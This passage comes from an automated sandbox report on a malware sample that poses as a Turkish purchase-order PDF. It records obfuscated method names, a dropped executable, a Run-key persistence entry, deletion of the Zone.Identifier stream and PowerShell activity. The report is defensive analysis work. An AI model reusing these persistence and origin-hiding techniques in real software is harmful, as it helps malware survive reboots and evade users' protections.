                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, x6JxON1fwtwdPv1xTFC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r7G1qyhX7A', 'II81Z91QFb', 'txD1RcIZVE', 'GNt1OcUQar', 'BMM1DfKuRV', 'Txn1SHNL32', 'Fp31uwPxnP'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, ntOxXKIEe5iRt4Qe5q.csHigh entropy of concatenated method names: 'BJfp6K3y4', 'udFAjHXac', 'xU4tgXgXE', 'u5vWMCBb9', 'jreKZ2qXL', 'bwfBQWgCP', 'ayfG47kdllTypplx7N', 'xcdbQeAQiFtNTEYDTt', 'HEIvVbrSx', 'O7d1wJbA2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, BIfda5lRrt3Eiso9an.csHigh entropy of concatenated method names: 'Eg04qm49oX', 'TIt4Z8Qlyf', 'UMa4R3fm82', 'kac4OUuKdk', 'Wdf4DSV9aD', 'G7V4Sihgmp', 'w7M4ufvsLm', 'TL34k36rvX', 'MTZ4dYNSJH', 'KCL40y22cd'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.csHigh entropy of concatenated method names: 'iSZjrFLIIU', 'pc4jIybYG3', 'G73j4DnXe1', 'eKnjgq4lYe', 'cpbjF8yDPn', 'FT6jPiMRQC', 'Xu8j6rL2D1', 'zG7j3vuZ6g', 'pvej9DimmY', 'P5LjEediRc'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, T6xyn5eNsSbpx3PLt2.csHigh entropy of concatenated method names: 'lwvlXEjwdG', 'd8wljijiCv', 'b0alelYUAL', 'jhelIeGOLx', 'R0dl4IANpm', 'noelFF19Y2', 'gFLlPBBodY', 'CMCvu3DOMJ', 'jY7vkbiMmP', 'bIGvdeKITt'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, yfxSClFQMwFmEK7MNd.csHigh entropy of concatenated method names: 'gHYvs0YqNq', 'xXQvfKbqp5', 'tfdvQIUkdA', 'pltvGVRaKY', 'CpDvqD8f8h', 'vcTvJNwC5r', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, yOgMYxXHsaP1Od2Zjt.csHigh entropy of concatenated method names: 'aNHacmHOro', 'xMWaxRQQUG', 'SfvaqVYQoG', 'UQraZGtIqa', 'vu1af1NpbH', 'dP6aQb5iT0', 'unqaGn8lRE', 'uuAaJkefs4', 'K0OaoreKTI', 'AsjaNJUqe2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, Crn3a66HqHiB80qX1X.csHigh entropy of concatenated method names: 'byBX6yw6N1', 'gFcX3qYBKN', 'bYhXEmXc63', 'Y28XiYegO4', 'YHyXabcPCo', 'aRpXTe7ppB', 'I1hYLgEn8P4amhhEat', 'm3sFc9LipkykZ3H8j3', 'ktaXXJZpfh', 'T6cXjwG0HS'
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to dropped file
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
